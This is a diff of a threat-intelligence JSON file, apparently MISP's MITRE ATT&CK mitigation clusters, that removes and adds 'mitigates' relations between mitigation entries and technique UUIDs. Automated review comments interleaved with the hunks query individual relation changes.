- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "8c918d8a-11c5-4ffd-af10-e74bc06bdfae",
"value": "Rundll32 Mitigation - T1085"
},
@@ -13241,15 +10457,7 @@
"https://attack.mitre.org/mitigations/T1062"
]
},
- "related": [
- {
- "dest-uuid": "4be89c7c-ace6-4876-9377-c8d54cef3d63",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "2c3ce852-06a2-40ee-8fe6-086f6402a739",
"value": "Hypervisor Mitigation - T1062"
},
@@ -13261,15 +10469,7 @@
"https://attack.mitre.org/mitigations/T1207"
]
},
- "related": [
- {
- "dest-uuid": "564998d8-ab3e-4123-93fb-eccaa6b9714a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "b70627f7-3b43-4c6f-8fc0-c918c41f8f72",
"value": "DCShadow Mitigation - T1207"
},
@@ -13324,13 +10524,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "3120b9fa-23b8-4500-ae73-09494f607b7d",
"tags": [
@@ -13380,13 +10573,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "4579d9c9-d5b9-45e0-9848-0104637b579f",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4d2a5b3e-340d-4600-9123-309dd63c9bf8",
"tags": [
@@ -13408,13 +10594,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "56ff457d-5e39-492b-974c-dfd2b8603ffe",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "58a3e6aa-4453-4cc8-a51f-4befe80b31a8",
"tags": [
@@ -13478,20 +10657,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "a257ed11-ff3b-4216-8c9d-3938ef57064c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a93494bb-4b80-4ea1-8695-3236a49916fd",
"tags": [
@@ -13520,13 +10685,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "b6075259-dba3-44e9-87c7-e954f37ec0d5",
"tags": [
@@ -13548,27 +10706,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "ba8e391f-14b5-496f-81f2-2d5ecd646c1c",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c1b11bf7-c68e-4fbf-a95b-28efbe7953bb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "c23b740b-a42b-47a1-aec2-9d48ddd547ff",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d0b4fcdb-d67d-4ed2-99ce-788b12f8c0f4",
"tags": [
@@ -13652,13 +10789,6 @@
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
- },
- {
- "dest-uuid": "ffe742ed-9100-4686-9e00-c331da544787",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
}
],
"uuid": "90c218c3-fbf8-4830-98a7-e8cfb7eaa485",
@@ -13673,15 +10803,7 @@
"https://attack.mitre.org/mitigations/T1208"
]
},
- "related": [
- {
- "dest-uuid": "b39d03cb-7b98-41c4-a878-c40c1a913dc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "a3e12b04-8598-4909-8855-2c97c1e7d549",
"value": "Kerberoasting Mitigation - T1208"
},
@@ -13715,13 +10837,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2e114e45-2c50-404c-804a-3af9564d240e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b",
"tags": [
@@ -13743,13 +10858,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "b82f7d37-b826-4ec9-9391-8e121c78aed7",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "d45a3d09-b3cf-48f4-9f0f-f521ee5cb05c",
"tags": [
@@ -13788,15 +10896,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "45e7f570-6a0b-4095-bf02-4bca05da6bae",
"value": "Masquerading Mitigation - T1036"
},
@@ -13816,20 +10916,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "04ee0cb7-dac3-4c6c-9387-4c6aa096f4cf",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "09cd431f-eaf4-4d2a-acaf-2a7acfe7ed58",
"tags": [
@@ -13858,13 +10944,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "101c3a64-9ba5-46c9-b573-5c501053cbca",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "10ff21b9-5a01-4268-a1b5-3b55015f1847",
"tags": [
@@ -13887,14 +10966,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "1ce03c65-5946-4ac9-9d4d-66db87e024bd",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "215190a9-9f02-4e83-bb5f-e0589965a302",
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
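Review bot: The in-place substitution of dest-uuid 215190a9-9f02-4e83-bb5f-e0589965a302 by 208884f1-7b83-4473-ac22-4e1cf6c41471 in this hunk is a diff-alignment artifact; together with the removal of 1ce03c65-5946-4ac9-9d4d-66db87e024bd just above it, the net change is two relations dropped and one added. 208884f1 is also added to a second entry at -15868, but 215190a9 is not re-added anywhere in this patch, so please confirm it was revoked upstream and not lost by the generator. The placement of the new entry is consistent with the array's ascending uuid order.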
@@ -13914,13 +10986,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2892b9ee-ca9f-4723-b332-0dc6e843a8ae",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2cd950a6-16c4-404a-aa01-044322395107",
"tags": [
@@ -13935,13 +11000,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "317fefa6-46c7-4062-adb6-2008cf6bcb41",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "31a0a2ac-c67c-4a7e-b9ed-6a96477d4e8e",
"tags": [
@@ -13998,13 +11056,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "46944654-fcc1-4f63-9dad-628102376586",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4a5b7ade-8bb5-4853-84ed-23f262002665",
"tags": [
@@ -14012,13 +11063,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "4bf5845d-a814-4490-bc5c-ccdee6043025",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "4cbc6a62-9e34-4f94-8a19-5c1a11392a49",
"tags": [
@@ -14034,14 +11078,14 @@
"type": "mitigates"
},
{
- "dest-uuid": "514ede4c-78b3-4d78-a38b-daddf6217a79",
+ "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
"type": "mitigates"
},
{
- "dest-uuid": "543fceb5-cb92-40cb-aacf-6913d4db58bc",
+ "dest-uuid": "55bb4471-ff1f-43b4-88c1-c9384ec47abf",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
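Review bot: This hunk reads as two uuid substitutions but nets out to one removal (514ede4c-78b3-4d78-a38b-daddf6217a79) and one addition (55bb4471-ff1f-43b4-88c1-c9384ec47abf), with 543fceb5-cb92-40cb-aacf-6913d4db58bc unchanged; the removed uuid does not reappear elsewhere in the patch. Line-oriented diffs of sorted relation lists shift entries like this whenever a neighbour is removed, so a generated summary of added and removed target UUIDs in the commit message would make these hunks reviewable without manual pairing.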
@@ -14075,13 +11119,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "6e3bd510-6b33-41a4-af80-2d80f3ee0071",
"tags": [
@@ -14089,13 +11126,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6fb6408c-0db3-41d9-a3a1-a32e5f16454e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "70e52b04-2a0c-4cea-9d18-7149f1df9dc5",
"tags": [
@@ -14103,13 +11133,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "72b5ef57-325c-411b-93ca-a3ca6fa17e31",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
@@ -14131,13 +11154,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7e7c2fba-7cca-486c-9582-4c1bb2851961",
"tags": [
@@ -14173,13 +11189,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "8df54627-376c-487c-a09c-7d2b5620f56e",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736",
"tags": [
@@ -14187,20 +11196,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "9b99b83a-1aac-4e29-b975-b374950551a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "a127c32c-cbb0-4f9d-be07-881a792408ec",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "a1b52199-c8c5-438a-9ded-656f1d0888c6",
"tags": [
@@ -14271,6 +11266,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "bef8aaee-961d-4359-a308-4c2182bcedff",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "bf96a5a3-3bce-43b7-8597-88545984c07b",
"tags": [
@@ -14285,13 +11287,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c4ad009b-6e13-4419-8d21-918a1652de02",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c92e3d68-2349-49e4-a341-7edca2deff96",
"tags": [
@@ -14334,13 +11329,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d21a2069-23d5-4043-ad6d-64f6b644cb1a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "dfd7cc1d-e1d8-4394-a198-97c4cab8aa67",
"tags": [
@@ -14362,13 +11350,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f792d02f-813d-402b-86a5-ab98cb391d3b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ff25900d-76d5-449b-a351-8824e62fc81b",
"tags": [
@@ -14487,20 +11468,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6a5848a8-6201-4a2c-8a6a-ca5af8c6f3df",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "723e3a2b-ca0d-4daa-ada8-82ea35d3733a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "74d2a63f-3c7b-4852-92da-02d8fbab16da",
"tags": [
@@ -14557,13 +11524,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "c5e31fb5-fcbd-48a4-af8c-5a6ed5b932e5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "c615231b-f253-4f58-9d47-d5b4cbdb6839",
"tags": [
@@ -14578,13 +11538,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "d519cfd5-f3a8-43a9-a846-ed0bb40672b1",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a",
"tags": [
@@ -14592,13 +11545,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "edbe24e9-aec4-4994-ac75-6a6bc7f1ddd0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ee7ff928-801c-4f34-8a99-3df965e581a5",
"tags": [
@@ -14619,13 +11565,6 @@
]
},
"related": [
- {
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0f2c410d-d740-4ed9-abb1-b8f4a7faf6c3",
"tags": [
@@ -14661,13 +11600,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "327f3cc5-eea1-42d4-a6cd-ed34b7ce8f61",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "35187df2-31ed-43b6-a1f5-2f1d3d58d3f1",
"tags": [
@@ -14696,27 +11628,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "5ad95aaa-49c1-4784-821d-2e83f47b079b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6e6845c2-347a-4a6f-a2d1-b74a18ebd352",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "723e3a2b-ca0d-4daa-ada8-82ea35d3733a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830",
"tags": [
@@ -14738,13 +11649,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "a0a189c8-d3bd-4991-bf6f-153d185ee373",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "ae7f3575-0a5e-427e-991b-fe03ad44c754",
"tags": [
@@ -14787,13 +11691,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "f9e9365a-9ca2-4d9c-8e7c-050d73d1101a",
"tags": [
@@ -14821,13 +11718,6 @@
]
},
"related": [
- {
- "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "16ab6452-c3c1-497c-a47d-206018ca1ada",
"tags": [
@@ -14863,13 +11753,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "6856ddd6-2df3-4379-8b87-284603c189c3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "7f0ca133-88c4-40c6-a62f-b3083a7fbc2e",
"tags": [
@@ -14926,15 +11809,7 @@
"https://cloudblogs.microsoft.com/microsoftsecure/2016/03/22/new-feature-in-office-2016-can-block-macros-and-help-prevent-infection/"
]
},
- "related": [
- {
- "dest-uuid": "7fd87010-3a00-4da3-b905-410525e8ec44",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "57019a80-8523-46b6-be7d-f763a15a2cc6",
"value": "Scripting Mitigation - T1064"
},
@@ -14948,22 +11823,7 @@
"https://docs.microsoft.com/en-us/windows/security/information-protection/secure-the-windows-10-boot-process"
]
},
- "related": [
- {
- "dest-uuid": "02fefddc-fb1b-423f-a76b-7552dd211d4d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "1b7b1806-7746-41a1-a35d-e48dae25ddba",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "96150c35-466f-4f0a-97a9-ae87ee27f751",
"value": "Bootkit Mitigation - T1067"
},
@@ -14976,15 +11836,7 @@
"https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/"
]
},
- "related": [
- {
- "dest-uuid": "f4882e23-8aa7-4b12-b28a-b349c12ee9e0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "d0415180-51e9-40ce-b57c-c332b0b441f2",
"value": "PowerShell Mitigation - T1086"
},
@@ -15001,22 +11853,7 @@
"https://technet.microsoft.com/en-us/library/ee791851.aspx"
]
},
- "related": [
- {
- "dest-uuid": "128c55d3-aeba-469f-bd3e-c8996ab4112a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "47f2d673-ca62-47e9-929b-1b0be9657611",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5c167af7-c2cb-42c8-ae67-3fb275bf8488",
"value": "Timestomp Mitigation - T1099"
},
@@ -15029,15 +11866,7 @@
"https://github.com/iadgov/Secure-Host-Baseline/tree/master/EMET"
]
},
- "related": [
- {
- "dest-uuid": "68f7e3a1-f09f-4164-9a62-16b648a0dd5a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "12c13879-b7bd-4bc5-8def-aacec386d432",
"value": "Regsvr32 Mitigation - T1117"
},
@@ -15049,15 +11878,7 @@
"https://attack.mitre.org/mitigations/T1118"
]
},
- "related": [
- {
- "dest-uuid": "f792d02f-813d-402b-86a5-ab98cb391d3b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "ec418d1b-4963-439f-b055-f914737ef362",
"value": "InstallUtil Mitigation - T1118"
},
@@ -15070,15 +11891,7 @@
"https://msitpros.com/?p=3960"
]
},
- "related": [
- {
- "dest-uuid": "7d6f590f-544b-45b4-9a42-e0805f342af3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "91816292-3686-4a6e-83c4-4c08513b9b57",
"value": "CMSTP Mitigation - T1191"
},
@@ -15090,15 +11903,7 @@
"https://attack.mitre.org/mitigations/T1142"
]
},
- "related": [
- {
- "dest-uuid": "9e09ddb2-1746-4448-9cad-7f8b41777d6d",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "56648de3-8947-4559-90c4-eda10acc0f5a",
"value": "Keychain Mitigation - T1142"
},
@@ -15110,15 +11915,7 @@
"https://attack.mitre.org/mitigations/T1152"
]
},
- "related": [
- {
- "dest-uuid": "53bfc8bf-8f76-4cd7-8958-49a884ddb3ee",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "e333cf16-5bfa-453e-8e6a-3a4c63d6bfcc",
"value": "Launchctl Mitigation - T1152"
},
@@ -15130,15 +11927,7 @@
"https://attack.mitre.org/mitigations/T1153"
]
},
- "related": [
- {
- "dest-uuid": "45d84c8b-c1e2-474d-a14d-69b5de0a2bc0",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5391ece4-8866-415d-9b5e-8dc5944f612a",
"value": "Source Mitigation - T1153"
},
@@ -15150,15 +11939,7 @@
"https://attack.mitre.org/mitigations/T1154"
]
},
- "related": [
- {
- "dest-uuid": "b53dbcc6-147d-48bb-9df4-bcb8bb808ff6",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "809b79cd-be78-4597-88d1-5496d1d9993a",
"value": "Trap Mitigation - T1154"
},
@@ -15171,15 +11952,7 @@
"https://attack.mitre.org/mitigations/T1148"
]
},
- "related": [
- {
- "dest-uuid": "086952c4-5b90-4185-b573-02bad8e11953",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "03c0c586-50ed-45a7-95f4-f496d7eb5330",
"value": "HISTCONTROL Mitigation - T1148"
},
@@ -15192,29 +11965,7 @@
"https://owasp.org/www-project-top-ten/OWASP_Top_Ten_2017/"
]
},
- "related": [
- {
- "dest-uuid": "0cfe31a7-81fc-472c-bc45-e2808d1066a3",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "5909f20f-3c39-4795-be06-ef1ea40d350b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "8c41090b-aa47-4331-986b-8c9a51a91103",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "5d8507c4-603e-4fe1-8a4a-b8241f58734b",
"value": "Defacement Mitigation - T1491"
},
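Review bot: Unlike most of the emptied "related" arrays in this patch, the three targets removed here are not all dangling references: 5909f20f-3c39-4795-be06-ef1ea40d350b still appears as an unchanged context line in another entry's relations at -13715, so dropping it from "Defacement Mitigation - T1491" is a genuine change of mapping rather than revoked-technique cleanup. Please confirm this matches the upstream relationships for T1491, or keep this relation.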
@@ -15227,15 +11978,7 @@
"https://www.engadget.com/2013/10/23/applescript-and-automator-gain-new-features-in-os-x-mavericks/"
]
},
- "related": [
- {
- "dest-uuid": "5ad95aaa-49c1-4784-821d-2e83f47b079b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "1e4ef2c7-ee96-4484-9baa-3b5777561301",
"value": "AppleScript Mitigation - T1155"
},
@@ -15247,15 +11990,7 @@
"https://attack.mitre.org/mitigations/T1169"
]
},
- "related": [
- {
- "dest-uuid": "9e80ddfb-ce32-4961-a778-ca6a10cfae72",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "23bff3ce-021c-4e7a-9aee-60fd40bc7c6c",
"value": "Sudo Mitigation - T1169"
},
@@ -15267,15 +12002,7 @@
"https://attack.mitre.org/mitigations/T1179"
]
},
- "related": [
- {
- "dest-uuid": "66f73398-8394-4711-85e5-34c8540b22a5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- }
- ],
+ "related": [],
"uuid": "7aee8ea0-0baa-4232-b379-5d9ce98352cf",
"value": "Hooking Mitigation - T1179"
},
@@ -15337,6 +12064,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "155207c0-7f53-4f13-a06b-0a9907ef5096",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "166de1c6-2814-4fe5-8438-4e80f76b169f",
"tags": [
@@ -15771,6 +12505,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "d21bb61f-08ad-4dc1-b001-81ca6cb79954",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "db8f5003-3b20-48f0-9b76-123e44208120",
"tags": [
@@ -15868,6 +12609,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "208884f1-7b83-4473-ac22-4e1cf6c41471",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597",
"tags": [
@@ -15876,21 +12624,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "6aac77c4-eaf2-4366-8c13-ce50ab951f38",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6be14413-578e-46c1-8304-310762b3ecd5",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
- {
- "dest-uuid": "6ff403bc-93e3-48be-8687-e102fdba8c88",
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
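Review bot: The substitution at the end of this hunk makes 42e8de7b-37b2-4258-905a-6897815e58e0 a new mitigation target here, while the same uuid is removed as the sole relation of "Masquerading Mitigation - T1036" at -13788 and as a "uses" relation in mitre-intrusion-set.json at -4056. A technique gaining a mitigation relation and losing a group relation in the same regeneration is plausible, but it deserves a line in the commit message. Net change in this hunk: 6aac77c4, 6be14413 and 6ff403bc removed, 42e8de7b added.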
@@ -15939,7 +12673,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "d3df754e-997b-4cf9-97d4-70feb3120847",
+ "dest-uuid": "d511a6f6-4a33-41d5-bc95-c343875d1377",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
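Review bot: d3df754e-997b-4cf9-97d4-70feb3120847 is replaced by d511a6f6-4a33-41d5-bc95-c343875d1377 here, d3df754e is also removed at -13124, and d511a6f6 is added as a "uses" relation to three intrusion sets in the second file (-1669, -2273, -2515). That is the pattern of an upstream technique revocation with a successor; if so, the old/new uuid pair belongs in the commit message so downstream MISP instances can remap existing tags, and it is worth checking that the old uuid no longer exists as an attack-pattern cluster entry either.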
@@ -16112,7 +12846,7 @@
"type": "mitigates"
},
{
- "dest-uuid": "04ef4356-8926-45e2-9441-634b6f3dcecb",
+ "dest-uuid": "02c5abff-30bf-4703-ab92-1f6072fae939",
"tags": [
"estimative-language:likelihood-probability=\"almost-certain\""
],
@@ -16132,13 +12866,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "0ca7beef-9bbc-4e35-97cf-437384ddce6a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "0cf55441-b176-4332-89e7-2c4c7799d0ff",
"tags": [
@@ -16188,13 +12915,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "27960489-4e7f-461d-a62a-f5c0cb521e4a",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "28abec6c-4443-4b03-8206-07f2e264a6b4",
"tags": [
@@ -16223,13 +12943,6 @@
],
"type": "mitigates"
},
- {
- "dest-uuid": "2edd9d6a-5674-4326-a600-ba56de467286",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "mitigates"
- },
{
"dest-uuid": "2fee9321-3e71-4cf4-af24-d4d40d355b34",
"tags": [
@@ -16286,6 +12999,13 @@
],
"type": "mitigates"
},
+ {
+ "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "mitigates"
+ },
{
"dest-uuid": "435dfb86-2697-4867-85b5-2fef496c0517",
